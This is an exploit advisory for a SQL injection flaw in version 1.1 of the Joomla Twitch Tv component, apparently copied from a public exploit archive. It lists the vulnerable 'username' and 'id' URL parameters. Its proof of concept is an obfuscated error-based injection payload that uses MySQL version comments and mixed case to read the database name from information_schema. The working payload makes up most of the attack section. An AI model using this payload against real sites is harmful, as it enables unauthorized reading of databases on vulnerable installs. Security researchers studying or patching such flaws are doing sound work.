28 lines
No EOL
1.1 KiB
Text
28 lines
No EOL
1.1 KiB
Text
# # # # #
|
|
# Exploit Title: Joomla! Component Twitch Tv 1.1 - SQL Injection
|
|
# Dork: N/A
|
|
# Date: 18.08.2017
|
|
# Vendor Homepage: http://www.raindropsinfotech.com/
|
|
# Software Link: https://extensions.joomla.org/extensions/extension/sports-a-games/game-servers/twitch-tv-component/
|
|
# Demo: http://www.raindropsinfotech.com/example/twitch.tv
|
|
# Version: 1.1
|
|
# Category: Webapps
|
|
# Tested on: WiN7_x64/KaLiLinuX_x64
|
|
# CVE: N/A
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Social: @ihsansencan
|
|
# # # # #
|
|
# Description:
|
|
# The vulnerability allows an attacker to inject sql commands....
|
|
#
|
|
# Proof of Concept:
|
|
#
|
|
# http://localhost/[PATH]/index.php?option=com_twitchtv&view=twitch&username=[SQL]
|
|
# gobgg'++aND(/*!22223SELECT*/+0x30783331+/*!22223FROM*/+(/*!22223SELECT*/+cOUNT(*),/*!22223CONCAT*/((sELECT(sELECT+/*!22223CONCAT*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+aNd+''='
|
|
#
|
|
# http://localhost/[PATH]/index.php?option=com_twitchtv&view=gamecenter&id=[SQL]
|
|
#
|
|
# Etc..
|
|
# # # # # |